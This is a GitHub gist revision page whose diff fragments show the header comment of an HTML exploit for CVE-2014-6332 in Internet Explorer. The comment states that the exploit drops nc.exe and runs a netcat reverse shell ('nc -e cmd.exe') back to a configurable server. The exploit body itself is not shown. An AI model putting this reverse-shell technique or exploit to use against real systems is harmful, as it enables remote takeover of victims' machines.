-
-
Save Sh4ttel2/446d8066d3a43c1a414d to your computer and use it in GitHub Desktop.
Revisions
-
worawit renamed this gist
Dec 4, 2014 . 1 changed file with 4 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,8 +1,8 @@ <html> <head> <!-- CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" 'server_ip' and 'server_port' in javascript below determined the connect back target Tested on @@ -17,6 +17,7 @@ - https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf - http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb - https://github.com/exp-sky/explib2/ --> <meta http-equiv="x-ua-compatible" content="IE=10"> @@ -384,6 +385,6 @@ </head> <body> CVE-2014-6332 </body> </html> -
Dec 2, 2014 .There are no files selected for viewing